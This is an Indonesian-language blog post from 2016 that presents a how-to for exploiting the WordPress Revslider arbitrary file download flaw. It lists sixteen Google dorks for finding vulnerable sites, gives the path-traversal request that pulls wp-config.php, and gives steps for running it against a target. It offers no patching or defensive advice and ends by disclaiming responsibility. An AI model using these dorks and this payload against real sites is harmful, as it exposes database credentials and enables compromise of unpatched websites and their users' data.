Ads Header

Exploit Wordpress Revslider Arbritary File Download Vulnerability

Selasa, 19 April 2016 Tambah Komentar
Naufal Ardhani - Halo teman kali ini saya akan membahas Exploit Wordpress Revslider Arbritary File Download pada exploit ini anda sanggup mendownload file file penting yang ada di dalam server web tersebut khususnya web yang memakai cms Wordpress tapi tidak semua web yang memakai cms tersebut rentan dengan exploit ini.

Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi perihal security.



Dork :

  • inurl:wp-content/plugins/revslider/
  • inurl:revslider
  • inurl:revslider_admin.php
  • inurl:revslider_front.php
  • inurl:plugins/revslider/
  • intext:Powered by Revslider
  • intitle:"Index Of/ revslider"
  • intitle:"Index Of/wp-content/themes/revslider"
  • intitle:"Index Of/wp-content/plugins/revslider"
  • intitle:"Index Of/admin/revslider"
  • intitle:"Index Of/fr/revslider"
  • intitle:"Index Of/en/revslider"
  • intitle:"Index Of/us/revslider"
  • intitle:"Index Of/ar/revslider"
  • intitle:"Index Of/es/revslider"
  • intitle:"Index Of/de/revslider"
Exploit :
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Step :
  1. Dorking dengan dork yang sudah disediakan.
  2. Disini saya sudah mempunyai sasaran yang vuln/rentan tinggal kasih exploit, teladan : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  3. Dan jikalau berhasil admin-ajax.php terdownload kemudian buka dengan text editor.

Sekian saja Exploit Wordpress Revslider Arbitary File Download Vulnerability yang saya bagikan biar bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.

Belum ada Komentar untuk "Exploit Wordpress Revslider Arbritary File Download Vulnerability"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel